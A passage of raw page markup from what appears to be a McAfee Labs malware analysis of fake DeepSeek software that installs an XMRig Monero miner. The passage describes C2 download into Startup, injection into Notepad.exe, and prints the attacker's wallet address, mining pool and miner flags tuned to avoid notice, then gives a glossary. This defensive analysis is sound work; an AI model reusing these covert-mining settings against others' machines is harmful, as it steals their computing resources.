https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-1024x170.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-768x127.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.24.25-PM-205x34.png 205w\" sizes=\"auto, (max-width: 1498px) 100vw, 1498px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"NormalTextRun SCXW172331638 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">1<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">5<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">: Creating Run Key entry to <\/span><span class=\"NormalTextRun SCXW172331638 BCX0\">maintain<\/span><span class=\"NormalTextRun SCXW172331638 BCX0\"> persistence<\/span><\/strong><\/em><\/p>\n<ul>\n<li><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">Th<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">is<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> command retrieves a file named <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">client.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> from the C2 server, saves it in the <\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">Programs\\<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">Startup<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> as <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">runps.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">, and executes it<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\"> as its <strong>*<\/strong><strong>Payload<\/strong><\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">. The file <\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\">runps.exe<\/span><\/span><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> is <\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">identified as<\/span> <strong>*<\/strong><\/span><strong><span class=\"TextRun Underlined SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW195300034 BCX0\" data-ccp-charstyle=\"Hyperlink\">XMRig<\/span><\/span><\/strong><span class=\"TextRun SCXW195300034 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW195300034 BCX0\"> mining software.<\/span><span class=\"NormalTextRun SCXW195300034 BCX0\">\u00a0<\/span><\/span><span class=\"EOP SCXW195300034 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<h3 aria-level=\"5\"><span data-contrast=\"none\">Payload<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">To initiate the mining process, it connects to the same C2 server and downloads additional parameters.\u00a0<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209944\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM.png\" alt=\"\" width=\"1620\" height=\"246\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM.png 1620w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-300x46.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-1024x155.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-768x117.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-1536x233.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.25.26-PM-205x31.png 205w\" sizes=\"auto, (max-width: 1620px) 100vw, 1620px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW163729613 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW163729613 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">1<\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">6<\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">: HTTP response that <\/span><span class=\"NormalTextRun SCXW163729613 BCX0\">contains<\/span> <span class=\"NormalTextRun SCXW163729613 BCX0\">additional<\/span> <span class=\"NormalTextRun SCXW163729613 BCX0\">parameters<\/span><\/span><span class=\"EOP SCXW163729613 BCX0\" data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p><b><span data-contrast=\"auto\">[{&#8220;address&#8221;:&#8221;494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3&#8243;,&#8221;idle_threads&#8221;:90,&#8221;idle_time&#8221;:1,&#8221;password&#8221;:&#8221;x&#8221;,&#8221;pool&#8221;:&#8221;pool.hashvault.pro:443&#8243;,&#8221;task&#8221;:&#8221;FALLEN|NOTASK&#8221;,&#8221;threads&#8221;:40}]<\/span><\/b><span data-ccp-props=\"{&quot;335559685&quot;:720,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">These are parameters used to identify the wallet address.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"6\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><span data-contrast=\"auto\">The payload injects into Notepad.exe (a legitimate windows process) uses the downloaded parameters to start the mining process.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209959\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM.png\" alt=\"\" width=\"1524\" height=\"286\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM.png 1524w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-300x56.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-1024x192.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-768x144.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.26.22-PM-205x38.png 205w\" sizes=\"auto, (max-width: 1524px) 100vw, 1524px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW116644677 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW116644677 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">1<\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">7<\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">: Notepad.exe being executed with <\/span><span class=\"NormalTextRun SCXW116644677 BCX0\">additional<\/span> <span class=\"NormalTextRun SCXW116644677 BCX0\">parameters<\/span><\/span><span class=\"EOP SCXW116644677 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<ul>\n<li><span class=\"TextRun SCXW241724983 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW241724983 BCX0\">We can further understand malware\u2019s behavior by analyzing <\/span><span class=\"NormalTextRun SCXW241724983 BCX0\">the <\/span><span class=\"NormalTextRun SCXW241724983 BCX0\">downloaded<\/span><span class=\"NormalTextRun SCXW241724983 BCX0\"> information<\/span><span class=\"NormalTextRun SCXW241724983 BCX0\">.<\/span><\/span>\n<ul>\n<li>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">&#8211;donate-level 2<\/span><\/b><span data-contrast=\"auto\">: The Donation level is set at 2%. I.e., 2% of the total mining time will be donated to XMRig developers.\u00a0<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">-o pool.hashvault.pro:443<\/span><\/b><span data-contrast=\"auto\">: This specifies the mining pool to connect to; pool.hashvault.pro (in this case)<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">-u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3: <\/span><\/b><span data-contrast=\"auto\">This is the wallet address where the mined cryptocurrency is sent.\u00a0<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"4\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">&#8211;cpu-max-threads-hint=40<\/span><\/b><span data-contrast=\"auto\"> indicates the number of CPU threads used for mining. In this instance, 40% of the available threads will be used. This limit prevents the system from slowing down, and the mining will remain unnoticed.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"5\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">No GPU Flags: <\/span><\/b><span data-contrast=\"auto\">Here, the GPU is not used in mining, which prevents any GPU detection tools from flagging the mining process.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><span class=\"TextRun SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW251569880 BCX0\">Upon further analysis, <\/span><span class=\"NormalTextRun ContextualSpellingAndGrammarErrorV2Themed SCXW251569880 BCX0\">We<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> noticed that it is used to mine <strong>*<\/strong><\/span><\/span><strong><span class=\"TextRun Underlined SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW251569880 BCX0\" data-ccp-charstyle=\"Hyperlink\">Monero<\/span><\/span><\/strong><span class=\"TextRun SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW251569880 BCX0\"> Cryptocurrency, and it <\/span><span class=\"NormalTextRun SCXW251569880 BCX0\">hasn&#8217;t<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> been reported for any <\/span><span class=\"NormalTextRun SCXW251569880 BCX0\">scams<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> yet.<\/span><\/span><span class=\"EOP SCXW251569880 BCX0\" data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209974\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM.png\" alt=\"\" width=\"1526\" height=\"650\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM.png 1526w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-300x128.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-1024x436.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-768x327.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-205x87.png 205w\" sizes=\"auto, (max-width: 1526px) 100vw, 1526px\" \/><\/p>\n<p style=\"text-align: center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW149430920 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW149430920 BCX0\">Figure <\/span><span class=\"NormalTextRun SCXW149430920 BCX0\">1<\/span><span class=\"NormalTextRun SCXW149430920 BCX0\">8<\/span><span class=\"NormalTextRun SCXW149430920 BCX0\">: Wallet status for the captured wallet address<\/span><\/span><span class=\"EOP SCXW149430920 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<h4 aria-level=\"5\"><span data-contrast=\"none\">Why Monero?<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h4>\n<p><span data-contrast=\"auto\">The attacker purposely mines Monero Cryptocurrency, as it prioritizes anonymity, making it impossible to track the movements of funds. This makes it a popular coin by a number of crypto-miners<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559731&quot;:720,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">Appendix of Terms<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Powershell<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">PowerShell is a cross-platform command-line shell and scripting language developed by Microsoft, primarily used for task automation and configuration management and streamlined administrative control across Windows, Linux, and macOS environments worldwide.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><span data-contrast=\"none\">Cryptominer<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">A cryptominer is software or hardware that uses computing power to validate cryptocurrency transactions, secure decentralized networks, and earn digital currency rewards, often straining system resources and raising energy consumption.<\/span><i><span data-contrast=\"auto\"> When used in the context of malware, it is <\/span><\/i><span data-contrast=\"auto\">unauthorized software that covertly uses infected devices to mine cryptocurrency, draining resources, slowing performance, increasing energy costs, and often remaining difficult to detect or remove.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><span data-contrast=\"none\">Process Injection<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">This is a term used to describe a technique where malware injects and overwrites legitimate processes in memory, thereby modifying their behavior to run malicious code and bypassing security measures. The target processes are typically trusted processes.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">C&amp;C<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">C&amp;C (Command and Control) is a communication channel used by attackers to remotely issue commands, coordinate activities, and data from compromised systems or networks.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Persistence<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">This term<\/span> <span data-contrast=\"auto\">refers to the techniques that malware or an attacker uses to maintain long-term access to a compromised system, even after reboots, logouts, or security interventions. Persistence ensures that the malicious payload or backdoor remains active and ready to execute even if the system is restarted or the user tries to remove it.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Payload<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">In malware, a payload is the main malicious component delivered or executed once the infection occurs, enabling destructive activities such as data theft, system damage, resource hogging or unauthorized control and infiltration.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">XMRig<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">XMRig is an open-source cryptocurrency mining software primarily used for mining Monero. It was originally developed as a legitimate tool for miners to efficiently utilize system resources to mine Monero using CPU and GPU power. However, due to its open-source nature and effectiveness, XMRig has become a popular tool for cryptominers.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p>&nbsp;<\/p>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Monero<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Monero (XMR) is a privacy-focused cryptocurrency that prioritizes anonymity, security, and decentralization. Launched in April 2014, Monero is designed to provide untraceable and unlinkable transactions, making it difficult for outside parties to monitor or track the movement of funds on its blockchain. It operates on a decentralized, peer-to-peer network\u00a0 but with enhanced privacy features.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3 aria-level=\"2\"><span data-contrast=\"none\">Indicators of Compromise (IoCs)<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210771\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM.png\" alt=\"\" width=\"1706\" height=\"1108\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM.png 1706w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-300x195.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-1024x665.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-768x499.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-1536x998.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-199x129.png 199w\" sizes=\"auto, (max-width: 1706px) 100vw, 1706px\" \/>\u00a0<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware&#8230;<\/p>\n","protected":false},"author":695,"featured_media":210430,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[10661],"tags":[],"coauthors":[4136],"class_list":["post-209804","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internet-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-17T07:00:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-17T20:57:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible 